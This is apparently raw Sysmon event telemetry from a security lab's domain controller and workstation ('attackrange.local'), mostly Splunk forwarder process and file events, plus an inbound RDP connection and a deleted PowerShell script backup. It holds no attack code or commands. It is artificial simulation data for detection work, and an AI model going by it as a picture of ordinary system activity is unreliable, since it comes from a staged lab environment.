07:47:52.097{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3A8-60EB-087D-00000000CF01}10144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.082{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A8-60EB-087D-00000000CF01}10144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.083{466BC892-F3A8-60EB-087D-00000000CF01}10144C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001047234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.680{466BC892-F3A9-60EB-0A7D-00000000CF01}88046488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A9-60EB-0A7D-00000000CF01}8804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:53.465{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:53.465{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F3A9-60EB-0A7D-00000000CF01}8804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.465{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A9-60EB-0A7D-00000000CF01}8804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.444{466BC892-F3A9-60EB-0A7D-00000000CF01}8804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.428{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8884BB4861ACEEDEC32C24D9FD4B9D8,SHA256=452ECA0ABE16776733A3AC0D41443753E5EC36680865E508CDC0B58AEF15D19F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:53.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55562CCC3D4E56017E2E2A48E537F237,SHA256=C7005E00A853A2C8952B441E00B7F11785D020F637565EFCC1B6173AB3BE2991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:53.097{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F930C7805F529F26B3C22A7ED6DC677,SHA256=771EBADE831C6E0D26DDA0FA0866E7D26C001DD7D18974A3BCF88F9E9A661EB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:46.659{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-50097-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001047244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.429{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBF00ED5D9C0E7421CC9E693860FFC53,SHA256=EC48BC676177FCE7A128A00AE250348DEC749F2E8796D3BF10F1569F7FBCDFC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:54.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9C1729BC593C1D23CD3B11D3607B532,SHA256=9626E2EC2D02D4E8BCA447DB50773E2ACC44B67603FF3F2C4C8C05ED756704D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.382{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC9C5D281074D7CECDFFC7476769EEDE,SHA256=F0BFA9FC8B3A661644B04BB42A61B0E8E94E1BBDF8E5B451174B52AA3F60B858,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.143{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3AA-60EB-0B7D-00000000CF01}9504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:54.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:54.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:54.127{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3AA-60EB-0B7D-00000000CF01}9504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.127{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3AA-60EB-0B7D-00000000CF01}9504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.128{466BC892-F3AA-60EB-0B7D-00000000CF01}9504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:55.442{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E14315ED6CAE27553C5CAC919398F35,SHA256=6A1364343805C2BC9F47E00406E5386A8596D7DFC1830A5765C3D3F7FE06C73C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:55.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=702B55380026247A6541A101DD323EB4,SHA256=4F187064CDD1AF02891441958BF5D88A5DCF1C8467DDA617EF7470367D3006BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:56.842{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001047248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:48.732{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50959-false10.0.1.12-8000- 23542300x80000000000000001047247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:56.460{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55C1FFBDF73521CCC9480642E3DD81CF,SHA256=555C3276E6ED49A0E127D00C3BA0951505A9B94B734340FD1C9D36E19A0912A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:56.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7F422D177E7C093DC8CD422A97CAF5,SHA256=2EE41D615C975A321CBCE60E283AA60DBB6FC597D1FE6F5E59B4423700A84F56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:57.994{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\sd1.ps1@2021-07-12_074750MD5=9C23E0F56B84EE9709000172EC5E6F3F,SHA256=CE019FECC2D05EB84CD552E654AD6C83D6E142EEC43A7B5CC27BCFDA8DC8CA6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
